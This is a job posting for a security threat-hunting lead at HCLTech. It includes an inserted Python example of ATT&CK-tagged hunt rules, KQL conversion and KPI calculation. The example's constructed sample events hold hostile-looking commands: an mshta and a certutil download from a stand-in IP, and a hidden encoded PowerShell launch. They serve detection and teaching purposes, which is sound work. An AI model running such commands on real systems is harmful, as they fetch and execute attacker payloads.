Track Lead - Security Investigations, SIEM
India
Job Description
Bengaluru, Karnataka

Job Summary

The Track Lead (Support & Operations) plays a pivotal role in managing security event investigations and implementing technical solutions within the organization. This position focuses on enhancing operational efficiencies, ensuring client satisfaction, and fostering a culture of continuous improvement and innovation among teams. The Track Lead is instrumental in aligning operational goals with organizational objectives while empowering teams to meet client SLAs effectively.

The role is also responsible for proactively identifying, investigating, and mitigating advanced cyber threats that evade traditional, alert-driven security controls. It focuses on hypothesis-driven and intelligence-led threat hunting across endpoint, network, identity, and cloud environments to reduce dwell time and raise detection maturity.

Key Responsibilities

1. Implement and optimize SOAR solutions to automate security event investigations, ensuring timely and accurate incident response while improving overall operational efficiency.
2. Develop and maintain comprehensive reporting using SIEM tools to provide insight into security incidents and operational performance, supporting informed decision-making.
3. Lead and mentor the support team by communicating project goals transparently and encouraging the adoption of best practices in security operations.
4. Collaborate with clients to understand their security needs thoroughly, ensuring the support team delivers tailored solutions that exceed client expectations.
5. Drive innovation by identifying opportunities for process improvement and implementing new ideas that enhance the effectiveness of security operations.

Conduct hypothesis-based and IOC-driven threat hunting across:
  Endpoint (EDR/XDR)
  SIEM / log management platforms
  Network telemetry (NDR)
  Identity logs (AD / Entra ID)
  Cloud platforms (Azure, AWS, M365)

Identify stealthy and advanced threats, including:
  Living-off-the-Land (LotL) techniques
  Advanced Persistent Threats (APTs)
  Lateral movement and privilege escalation
  Insider threat indicators

Develop and execute MITRE ATT&CK-aligned hunting hypotheses

Convert hunting findings into:
  Security incidents
  New detection rules (SIEM / EDR / XDR)
  Change or service requests (misconfigurations, logging gaps)

Collaborate with SOC, Incident Response, and Threat Intelligence teams

Produce hunting reports and KPIs (dwell time reduction, hunts converted to detections, incidents generated)
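The hunt-to-detection loop described in the responsibilities above, shown as an added example that is not part of this posting or of any HCLTech tooling: a handful of ATT&CK-tagged hunting hypotheses are run over constructed EDR-style process events, a rule that fires is promoted to a KQL query against the Microsoft Defender advanced-hunting DeviceProcessEvents table, and the KPIs the posting names are computed from the findings. The event schema, rule names and all sample events are assumptions invented for the example.

```python
"""Hypothesis-driven hunt over constructed EDR process telemetry.

Hypothesis (ATT&CK-aligned): an intruder is using Living-off-the-Land
binaries launched from Office or shell parents to fetch and run a payload.
Every event below is constructed for this example; none is a real capture.
"""
import base64
import binascii

OFFICE = ["winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"]

# Declarative hunt rules (hypothetical format): one hypothesis each, tagged
# with the ATT&CK technique it tests, so a rule that fires can be promoted
# to a scheduled detection without being rewritten.
HUNT_RULES = [
    {"name": "office_spawns_mshta", "technique": "T1218.005",
     "image": "mshta.exe", "parent_in": OFFICE, "cmdline_has": None},
    {"name": "office_spawns_powershell", "technique": "T1059.001",
     "image": "powershell.exe", "parent_in": OFFICE, "cmdline_has": None},
    {"name": "certutil_urlcache_download", "technique": "T1105",
     "image": "certutil.exe", "parent_in": None, "cmdline_has": "-urlcache"},
    {"name": "encoded_powershell", "technique": "T1027",
     "image": "powershell.exe", "parent_in": None, "cmdline_has": "-enc"},
]

# Constructed process-creation events in an EDR-like shape (hypothetical schema).
EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "winword.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.5/a.hta"},
    {"host": "ws01", "user": "alice", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.5/x.bin x.bin"},
    {"host": "ws02", "user": "svc_backup", "parent": "services.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"host": "ws03", "user": "bob", "parent": "excel.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"host": "ws04", "user": "carol", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe report.txt"},
]


def matches(rule, event):
    """True when one event satisfies every field condition of a hunt rule."""
    if event["image"].lower() != rule["image"]:
        return False
    if rule["parent_in"] and event["parent"].lower() not in rule["parent_in"]:
        return False
    if rule["cmdline_has"] and rule["cmdline_has"] not in event["cmdline"].lower():
        return False
    return True


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -enc/-EncodedCommand argument, or None.
    PowerShell encodes the script as base64 over UTF-16LE."""
    parts = cmdline.split()
    for i, p in enumerate(parts[:-1]):
        if p.lower() in ("-enc", "-encodedcommand"):
            try:
                return base64.b64decode(parts[i + 1]).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def run_hunt(events, rules=HUNT_RULES):
    """Apply every hunt rule to every event and return the findings."""
    findings = []
    for e in events:
        for r in rules:
            if matches(r, e):
                f = {"rule": r["name"], "technique": r["technique"], "host": e["host"],
                     "user": e["user"], "cmdline": e["cmdline"]}
                if e["image"].lower() == "powershell.exe":
                    f["decoded"] = decode_encoded_command(e["cmdline"])
                findings.append(f)
    return findings


def to_kql(rule):
    """Promote a hunt rule to a KQL detection against DeviceProcessEvents."""
    lines = ["DeviceProcessEvents", f'| where FileName =~ "{rule["image"]}"']
    if rule["parent_in"]:
        parents = ", ".join(f'"{p}"' for p in rule["parent_in"])
        lines.append(f"| where InitiatingProcessFileName in~ ({parents})")
    if rule["cmdline_has"]:
        lines.append(f'| where ProcessCommandLine contains "{rule["cmdline_has"]}"')
    lines.append("| project Timestamp, DeviceName, AccountName, "
                 "InitiatingProcessFileName, ProcessCommandLine")
    return "\n".join(lines)


def hunt_kpis(findings, rules=HUNT_RULES):
    """KPIs named in the role: hunts run, hunts promoted to detections,
    incidents generated (one per affected host), techniques observed."""
    fired = {f["rule"] for f in findings}
    return {"hunts_run": len(rules),
            "hunts_to_detections": len(fired),
            "incidents_generated": len({f["host"] for f in findings}),
            "techniques_observed": sorted({f["technique"] for f in findings})}


if __name__ == "__main__":
    found = run_hunt(EVENTS)
    for f in found:
        print(f["technique"], f["host"], f["user"], f.get("decoded") or f["cmdline"])
    print(hunt_kpis(found))
    print(to_kql(HUNT_RULES[0]))
```

The rules stay declarative so the same definition drives both the one-off hunt and the KQL that replaces it once it has proven its worth; a finding for a host that fired no rule (the rundll32 event on ws02) is a candidate for a follow-up hypothesis rather than an incident, which is the distinction the posting draws between incidents, new detections, and change requests.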


Skill Requirements

1. Strong proficiency in security event investigation and SOAR technologies.
2. In-depth knowledge of SIEM tools and their application in operational environments.
3. Excellent problem-solving abilities and a strong understanding of client relationship management.
4. Proven leadership skills with the ability to mentor and empower teams effectively.

Strong expertise in SIEM/SOAR platforms (Splunk, Microsoft Sentinel, Chronicle, Palo Alto XSIAM)
Hands-on experience with EDR/XDR tools (Microsoft XDR, CrowdStrike, SentinelOne, Palo Alto Cortex)
Proficiency in KQL / SPL / advanced hunting queries
Deep understanding of MITRE ATT&CK techniques and TTPs
Strong OS knowledge: Windows, Linux, macOS
Basic scripting skills (PowerShell / Python preferred)
Cloud security exposure (Azure, AWS, M365 Defender)

Other Requirements

1. Optional but valuable certifications: Certified Information Systems Security Professional (CISSP), Security+, or any relevant SOAR or SIEM certification.

Why HCLTech?

At HCLTech, you'll supercharge your potential. You'll find your career. And you'll find your spark. All at a place that knows that helping its customers stay on top starts by putting its people first.

HCLTech is a global technology company, home to more than 226,300 people across 60 countries, delivering industry-leading capabilities centered around digital, engineering, cloud and AI, powered by a broad portfolio of technology services and products. We work with clients across all major verticals, providing industry solutions for Financial Services, Manufacturing, Life Sciences and Healthcare, Technology and Services, Telecom and Media, Retail and CPG, and Public Services. Consolidated revenues as of 12 months ending December 2025 totaled $14.5 billion.

Benefits

At HCLTech, we believe in empowering our employees with comprehensive benefits that support their professional growth and enhance their well-being. When you sign up for a career with us, you gain access to:

Industry-benchmarked compensation
Best-in-class healthcare benefits
Personal time off
Maternity and paternity benefits
Access to skills / higher education programs and resources
Discounts on products and services via Benefit Box
Participation in CSR programs and living life with a purpose
Opportunities to grow and advance your career

Note: The benefits listed above vary depending on the nature of your employment and the country where you work. Some benefits may be available in some countries but not in all.